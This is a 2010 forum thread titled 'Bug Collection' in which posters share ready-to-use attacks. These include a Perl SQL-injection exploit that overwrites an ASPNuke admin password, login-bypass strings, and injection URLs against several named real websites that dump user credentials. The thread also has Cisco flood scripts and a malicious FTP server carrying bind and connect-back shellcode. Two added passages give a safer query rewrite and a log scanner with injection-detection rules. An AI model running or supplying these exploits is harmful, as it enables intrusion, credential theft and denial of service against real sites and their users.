Re: Bug Collection
Posted: Fri Jan 15, 2010 12:20 pm
by Digital Cat
Exploit for ASPNuke and ASP Portal
Code:
#!/usr/bin/perl
######################################################################################
# Organization Of Cat
######################################################################################
# Exploit for ASPNuke and ASP Portal
#
# Exploit By: [email protected]
#
######################################################################################
# Thanks to ==> Alpha_programmer , Crouz Security Team , Hat-squad security team
######################################################################################
use IO::Socket;
if (@ARGV < 1)
{
print "\n==========================================\n";
print " \n -- Digital Cat --\n\n";
print " Organization Of Cat \n\n";
print " cara gunakan:ASPNuke.pl <Victim> \n\n";
print "==========================================\n\n";
print "Contoh:\n\n";
print " ASPNuke.pl www.victim.com \n";
exit();
}
my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "koneksi terputus ke $host" }
print "[+]Terhubung\n";
$addr = "GET /module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c'%20,%20username='trapset'%20where%20userID=1%20-- HTTP/1.0\n";
$addr .= "Host: $host\n\n\n\n";
print "\n";
print $remote $addr;
print "[+]Sedang diproses...";
sleep(5);
print "melakukan proses pergantian password ...\n";
print "[+]OK , Sekarang mau loginnya dengan apa,silahkan konfirmasi : \n";
print "Username: trapset\n";
print "Password: trapset\n\n";
Okey…
Re: Bug Collection
Posted: Fri Jan 15, 2010 12:31 pm
by Digital Cat
Multiple SQL Injection Vulnerability
Injection in:
- projects.php
- contacts.php
- users.php
- types_authors.php
- bibliographies.php
- types_projects.php
- types_languages.php
- types_countries.php
Code :
Demo :
Vulnerable function:
Code:
function get_vatitle($idregister,$idregistervalue,$nameregister,$tableregister,$pretitle) {
$vartitle = "SELECT $nameregister FROM $tableregister WHERE ($idregister=$idregistervalue)";
$vartitle = mysql_query($vartitle) or die("error functions_queries line 4");
$vartitle = mysql_fetch_array($vartitle);
extract($vartitle);
$title = $pretitle." » ".$$nameregister;
return $title;
}
Key….
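The function posted above pastes all of its arguments into the SQL text, so the table name, the column names and the id value are all injectable when they come from the request. An added example (not code from the original post or the affected application) shows the same pattern beside a hardened form, ported to Python with sqlite3 so it runs stand-alone; the `ALLOWED` mapping and the table and column names are constructed assumptions.

```python
import sqlite3

# Hypothetical allowlist: table -> (id column, columns that may be shown as a title).
# The real application's schema is not on the page; these names are constructed.
ALLOWED = {
    "projects": ("id_project", {"title"}),
    "contacts": ("id_contact", {"name"}),
}

def get_title_unsafe(db, id_col, id_val, name_col, table, pretitle):
    """Same pattern as the posted function: every argument becomes SQL text."""
    row = db.execute(
        f"SELECT {name_col} FROM {table} WHERE ({id_col}={id_val})").fetchone()
    return f"{pretitle} » {row[0]}"

def get_title_safe(db, id_val, name_col, table, pretitle):
    """Identifiers come from the allowlist; the value is validated and bound."""
    if table not in ALLOWED or name_col not in ALLOWED[table][1]:
        raise ValueError("unknown table or column")
    id_col = ALLOWED[table][0]
    try:
        id_val = int(id_val)  # ids are integers; reject anything else
    except (TypeError, ValueError):
        raise ValueError("id must be an integer") from None
    row = db.execute(
        f"SELECT {name_col} FROM {table} WHERE {id_col} = ?", (id_val,)).fetchone()
    if row is None:
        raise LookupError("no such record")
    return f"{pretitle} » {row[0]}"

def demo_db():
    """Constructed in-memory database with one public and one sensitive table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE projects (id_project INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id_user INTEGER PRIMARY KEY, password TEXT);
        INSERT INTO projects VALUES (1, 'Atlas');
        INSERT INTO users VALUES (1, 'constructed-secret');
    """)
    return db
```

Placeholders can only bind values, never identifiers, which is why the table and column names go through the allowlist instead.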
Re: Bug Collection
Posted: Fri Jan 15, 2010 12:34 pm
by Digital Cat
Powered by BKWorks ProPHP Version 0.50 Beta 1
Login as :
Code:
Username : admin ' or ' 1=1
Password : anything or nothing
And you will be logged in.
Live Demo
Key…
Re: Bug Collection
Posted: Sat Jan 16, 2010 11:01 am
by Digital Cat
Bugs Online v2.14 Sql Injection
Download :
http://sourceforge.net/project/showfile ... p_id=42528
Bug :
Code:
http://[site]/help.asp?stype=-999'%20union%20select%200,suser_name,spassword%20from%20tblusers%20where%20'1
Key…
Re: Bug Collection
Posted: Sat Jan 16, 2010 11:03 am
by Digital Cat
noticias.php
Victim :
www.caindependiente.com
Link :
www.caindependiente.com/cms/noticias.php
Code:
union+all+select+0,1,2,3,concat%28usuario,0x3a3a,pass%29,5,6,7,8,9+from+usuarios—
Demo:
http://www.caindependiente.com/cms/noticias.php?id=-1+union+all+select+0,1,2,3,concat%28usuario,0x3a3a,pass%29,5,6,7,8,9+from+usuarios--
Login :
http://www.caindependiente.com/cms/login.php
key…
Re: Bug Collection
Posted: Sat Jan 16, 2010 11:04 am
by Digital Cat
Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
Target :
Greetz :
Code :
<?php
$FTW = str_repeat("A",1992);
com_print_typeinfo($FTW);
echo "Digital Cat.";
?>
Key…
Re: Bug Collection
Posted: Sat Jan 16, 2010 11:06 am
by Digital Cat
Flood Cisco CSS type 11000, 11050, 11150, 11800
Programming language : perl
Code:
#!/usr/bin/perl
use Net::RawIP;
$s_addr = $ARGV[0];
$vic = $ARGV[1];
print "\Digital Cat ([email protected])\n";
if(!$ARGV[1]){
die "Cara pengunaan: perl $0 <source address> <victim>\n";
}
@ports =(1..1024);
sub packet{
print "My Cat now commencing with packetting..\n";
$port= shift(@ports);
$p = new Net::RawIP;
$p->set({ip => {saddr => $s_addr,daddr => $vic},
tcp => {source => 31337,dest => $port,psh => 1, syn => 1}});
$p->send(0.05,150);
}
for($i=0;$i<10;$i++){
packet;
}
Key…
Re: Bug Collection
Posted: Sat Jan 16, 2010 11:07 am
by Digital Cat
Flood Cisco Type 677
Programming language :
Perl
Target Port :
23
Service :
Telnet Server
Code :
#!/usr/bin/perl
use IO::Socket;
use Getopt::Std;
getopts('s:', \%args);
if(!defined($args{s})){&usage; }
$serv = $args{s};
$foo = "?????????????????a~ %%%%%XX%%%%%"; $number = 30000;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "(23)",
) || die("Service Telnet tidak ditemukan! on $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nMengirim Packets\n");
sub usage {die("\n$0 -s <server>\n\n");}
Key…
Re: Bug Collection
Posted: Sat Jan 16, 2010 11:08 am
by Digital Cat
PoC exploit freebsd
Target :
- IglooFTP (FreeBSD 4.7)
- cftp (FreeBSD 4.7)
- Moxftp (FreeBSD 4.7)
- cftp (FreeBSD 5.0)
- IglooFTP (FreeBSD 5.0)
- Moxftp (FreeBSD 5.0)
Code :
#!/usr/bin/perl
use IO::Socket;
sub convert_ret {
my($ret) = @_;
for ($x=8; $x>0; $x=$x-2){
$ret = substr($ret_temp,$x,2);
$new_ret .= chr hex "$ret";
}
return $new_ret;
}
sub convert_ip {
my($ip) = @_;
@ip_tmp = split(/\./, $ip);
for($x=0; $x<4; $x++) {
$new_ip .= chr @ip_tmp[$x];
}
return $new_ip;
}
$server_port = 21;
$passive_server_port = 10324;
unless(@ARGV == 3 || @ARGV == 2)
{ die
"Penggunaan ./DSR-ftp_clients.pl Shellcode Client Ip\n
\tShellcode:\t0 = Portbind
\t\t\t1 = Connect back\n
\tClient:\t\t0 = IglooFTP (FreeBSD 4.7)
\t\t\t1 = cftp (FreeBSD 4.7)
\t\t\t2 = Moxftp (FreeBSD 4.7)
\t\t\t3 = cftp (FreeBSD 5.0)
\t\t\t4 = IglooFTP (FreeBSD 5.0)
\t\t\t5 = Moxftp (FreeBSD 5.0)\n"
}
($shellcode_arg, $client_arg, $extra_arg) = @ARGV;
$user_ip = convert_ip($extra_arg);
@shellcode_list = (
"Portbind,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80",
"Connect Back,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68"."$user_ip"."\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80");
@client_list = (
"IglooFTP - FreeBSD 4.7,188,0xbfbfc560,0",
"cftp - FreeBSD 4.7,8192,0xbfbffb04,1,300",
"mftp - FreeBSD 4.7,516,0xbfbff8e0,1,100",
"cftp - FreeBSD 5.0,8196,0xbfbffa30,1,300",
"IglooFTP - FreeBSD 5.0,212,0xbfbfc440,0",
"mftp - FreeBSD 5.0,532,0xbfbff950,1,100");
@client_info = split(/,/,@client_list[$client_arg]);
@shellcode_info = split(/,/,@shellcode_list[$shellcode_arg]);
print "\tDSR-ftp_clients by Digital Cat\n
Setting up Service on Port: $server_port
Client: @client_info[0]
Using Shellcode: @shellcode_info[0]
Using Offset: @client_info[2]\n";
$shellcode = @shellcode_info[1];
$shellcode_length = length($shellcode);
$nop_count = @client_info[1] - $shellcode_length - 8;
$nops = "\x90"x$nop_count;
$ret_temp = @client_info[2];
$ret = substr($ret_temp,2,8);
$ret = convert_ret($ret);
$ret = "$ret"x2;
if(@client_info[3] eq "1") {
$nops_x = "\x90"x@client_info[1];
$nops_y = "\x90"x@client_info[4];
$exploit_string = "$nops_x"."$ret"."$nops_y"."$shellcode";
}
if($client_arg == 0 or $client_arg == 4) {
$exploit_string ="total 666
drwxr-xr-x 25 root wheel 1536 Jan 28 00:13 .
drwxr-xr-x 14 root wheel 512 Jan 28 00:13 ..
-rwxr-xr-x 2 digital_cat digital_cat 512 Jan 29 01:00 $nops$shellcode$ret";
}
$server = IO::Socket::INET->new(LocalPort => $server_port,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10)
or die "My Cat Can't listen on $server_port : $!\n";
while ($client = $server->accept()) {
if(@client_info[3] == 1) {
print $client "220 $exploit_string\n";
}
if(@client_info[3] eq "0") {
print $client "220 0xdeadcode\n";
while($request !=~ /QUIT/i) {
$request = <$client>;
print $request;
if($request =~ /PASS/i) {
print $client "230 User anonymous My Cat logged in.\n";
}
if($request =~ /USER/i) {
print $client "331 Anonymous Password required for My Cat.\n";
}
if($request =~ /SYST/i) {
print $client "215 UNIX Type: L8\n";
}
if($request =~ /REST/i) {
print $client "350 My Cat Restarting.\n";
}
if($request =~ /TYPE/i) {
print $client "200 My Cat Type set to A.\n";
}
if($request =~ /PWD/i or $request =~ /FEAT/i) {
print $client "257 \"/usr/home/digital_cat/\" is current directory.\n";
}
if($request =~ /PASV/i) {
$passive_server = IO::Socket::INET->new(LocalPort => $passive_server_port,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10)
or die "My Cat Can't open passive port";
print $client "227 My Cat Entering Passive Mode (127,0,0,1,40,84)\n";
}
if ($request =~ /LIST/i) {
while($passive_client = $passive_server->accept()){
print $client "150 My Cat Starting transfer.\n";
print $passive_client $exploit_string;
close $passive_client;
print $client "226 BANG My Cat DEAD!!!\n";
}
}
}
close $client;
}
}
Re: Bug Collection
Posted: Sat Jan 30, 2010 7:03 am
by Muhammad_ibl
Here are some SQL Injection bugs. Hopefully they can serve as reference material.
Code:
http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28table_name%29
%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Code:
http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28column_name%2
9%20from%20information_schema.columns%20where%20table_name=0x6d656d62657273686970--
Code:
http://www.skw.co.id/news.php?id=-91%20union%20select%201,group_concat%28table_name%29,3,4,5
%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Code:
http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28bb_username,0x3a,b
b_password%29,3,4,5,6,7,8%20from%20bb_users--
Code:
http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28username,0x3a,pass
word%29,3,4,5,6,7,8%20from%20cms_users--
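The query-string injections collected in this thread (UNION SELECT, `information_schema` enumeration, stacked UPDATE) leave recognisable traces in web server access logs. An added detection example, not part of any post above, runs three rules over constructed log lines; the addresses, paths and table names in the sample are placeholders.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines; addresses, paths and table names are placeholders.
SAMPLE_LOG = """\
198.51.100.4 - - [16/Jan/2010:11:00:01 +0000] "GET /news.php?id=37 HTTP/1.1" 200 5120
203.0.113.9 - - [16/Jan/2010:11:00:07 +0000] "GET /news.php?id=-37%20union%20select%201,2,group_concat%28table_name%29%20from%20information_schema.tables-- HTTP/1.1" 200 812
203.0.113.9 - - [16/Jan/2010:11:00:09 +0000] "GET /article.asp?articleid=1%20;%20update%20t%20set%20c=1-- HTTP/1.0" 500 0
198.51.100.4 - - [16/Jan/2010:11:00:15 +0000] "GET /search.php?q=credit+union+select+committee HTTP/1.1" 200 900
203.0.113.20 - - [16/Jan/2010:11:00:20 +0000] "GET /item.php?id=-1+UNION+ALL+SELECT+0,1,2+from+t-- HTTP/1.1" 200 640
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

RULES = {
    # Require a column list or FROM after UNION SELECT to skip plain-text searches.
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b.*(,|\bfrom\b)", re.I | re.S),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "stacked_write": re.compile(r";\s*(update|insert|delete|drop)\b", re.I),
}

def normalise(query):
    """Decode %XX and '+' once, as the web server does, and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(query))

def scan(log_text):
    """Return (client, path, status, rule names) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target, status = m.groups()
        url = urlsplit(target)
        query = normalise(url.query)
        matched = sorted(name for name, rx in RULES.items() if rx.search(query))
        if matched:
            hits.append((client, url.path, int(status), matched))
    return hits

def by_client(hits):
    """Group rule names per client so repeated probing from one source stands out."""
    summary = {}
    for client, _path, _status, matched in hits:
        summary.setdefault(client, set()).update(matched)
    return summary

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs carry only the query string, so injection through POST fields, such as the login form in the ProPHP post, needs application or WAF logging to be seen.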